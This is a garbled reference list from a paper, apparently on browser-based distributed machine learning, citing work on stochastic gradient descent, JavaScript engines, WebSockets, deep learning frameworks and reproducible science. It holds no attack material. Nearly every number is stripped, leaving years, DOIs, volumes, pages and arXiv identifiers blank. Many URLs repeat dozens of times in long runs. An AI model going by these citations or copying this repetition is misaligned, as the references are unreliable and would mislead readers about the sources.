http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://www.ics.uci.edu/~babaks/site/home_files/icml _ahn.pdf http://dx.doi.org/ . / . http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://asmjs.org http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://papers.nips.cc/paper/ -do-deep-nets-really-need-to-be-deep http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://www.iro.umontreal.ca/~lisa/pointeurs/theano scipy .pdf http://dx.doi.org/ . /peerj-cs. bottou l. . large-scale machine learning with stochastic gradient descent. in: proceedings of compstat’ . new york: springer, – . boyd s, ghosh a, prabhakar b, shah d. . randomized gossip algorithms. ieee transactions on information theory ( ): – doi . /tit. . . can i use. . javascript api support comparison. available at http://caniuse.com/#cats=js api (accessed november ). casadevall a, fang fc. . reproducible science. infection and immunity ( ): – doi . /iai. - . chrome v . . chrome v : google’s high performance, open source, javascript engine. available at https://developers.google.com/v (accessed november ). coates a, huval b, wang t, wu d, catanzaro b, andrew n. . deep learning with cots hpc systems. in: proceedings of the th international conference on machine learning. – . collobert r, kavukcuoglu k, farabet c. . torch : a matlab-like environment for machine learning. in: biglearn, nips workshop. number epfl-conf- . available at http://ronan. collobert.com/pub/matos/ torch nipsw.pdf. cushing r, putra ghh, koulouzis s, belloum a, bubak m, de laat c. . distributed computing on an ensemble of browsers. internet computing, ieee ( ): – doi . /mic. . . dean j, corrado g, monga r, chen k, devin m, mao m, ranzato m, senior a, tucker p, yang k, le qv, ng ay. . large scale distributed deep networks. in: pereira f, burges cjc, bottou l, weinberger kq, eds. advances in neural information processing systems. red hook: curran associates, – . dean j, ghemawat s. . mapreduce: simplified data processing on large clusters. communications of the acm ( ): – doi . / . . duchi j, hazan e, singer y. . adaptive subgradient methods for online learning and stochastic optimization. the journal of machine learning research : – . dwork c. . differential privacy: a survey of results. in: theory and applications of models of computation. new york: springer, – . han s, ng wk, wan l, lee v. . privacy-preserving gradient-descent methods. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . hinton g, deng l, yu d, dahl ge, mohamed a, jaitly n, senior a, vanhoucke v, nguyen p, sainath tn, kingsbury b. . deep neural networks for acoustic modeling in speech recognition: the shared views of four research groups. ieee signal processing magazine ( ): – doi . /msp. . . ietf. . the websocket protocol. available at http://tools.ietf.org/html/rfc (accessed december ). jia y, shelhamer e, donahue j, karayev s, long j, girshick r, guadarrama s, darrell t. . caffe: convolutional architecture for fast feature embedding. arxiv preprint. arxiv: . . karpathy a. . convnetjs deep learning in the browser. available at http://www.convnetjs. com (accessed july ). khan f, foley-bourgon v, kathrotia s, lavoie e, hendren l. . using javascript and webcl for numerical computations: a comparative study of native and web technologies. in: proceedings of the th acm symposium on dynamic languages. new york: acm, – . krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep convolutional neural networks. in: advances in neural information processing systems. available at http://papers. nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks. meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /tit. . http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://caniuse.com/#cats=js_api http://dx.doi.org/ . /iai. - https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v https://developers.google.com/v http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://ronan.collobert.com/pub/matos/ _torch _nipsw.pdf http://dx.doi.org/ . /mic. . http://dx.doi.org/ . / . http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /msp. . http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://tools.ietf.org/html/rfc http://arxiv.org/abs/ . http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://www.convnetjs.com http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://papers.nips.cc/paper/ -imagenet-classification-with-deep-convolutional-neural-networks http://dx.doi.org/ . /peerj-cs. lane tj, shukla d, beauchamp ka, pande vs. . to milliseconds and beyond: challenges in the simulation of protein folding. current opinion in structural biology ( ): – doi . /j.sbi. . . . li m, andersen dg, park jw, smola aj, ahmed a, josifovski v, long j, shekita ej, su b-y. . scaling distributed machine learning with the parameter server. in: the th usenix symposium on operation systems design and implementation, – . available at https://www. usenix.org/conference/osdi /technical-sessions/presentation/li mu. lin m, chen q, yan s. . network in network. arxiv preprint. arxiv: . . liu s, yang n, li m, zhou m. . a recursive recurrent neural network for statistical machine translation. in: proceedings of acl. – . mcnutt m. . reproducibility. science ( ): doi . /science. . natural resources defense council. . data center efficiency assessment. issue paper ip: - -a, august . available at http://www.nrdc.org/energy/files/data-center-efficiency- assessment-ip.pdf. quinn ja, leyton-brown k, mwebaze e. . modeling and monitoring crop disease in developing countries. in: proceedings of the twenty-fifth aaai conference on artificial intelligence, aaai , san francisco, california, usa, august – , . palo alto: aaai. available at https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / . ray b, posnett d, filkov v, devanbu p. . a large scale study of programming languages and code quality in github. in: proceedings of the nd acm sigsoft international symposium on foundations of software engineering, fse . new york: acm, – . shvachko k, kuang h, radia s, chansler r. . the hadoop distributed file system. in: mass storage systems and technologies (msst), ieee th symposium on. piscataway: ieee, – . stodden v, borwein j, bailey dh. . “setting the default to reproducible” in computational science research. research ( ): – . stodden v, guo p, ma z. . toward reproducible computational research: an empirical analysis of data and code policy adoption by journals. plos one ( ):e doi . /journal.pone. . sutskever i, vinyals o, le qv. . sequence to sequence learning with neural networks. arxiv preprint. arxiv: . . 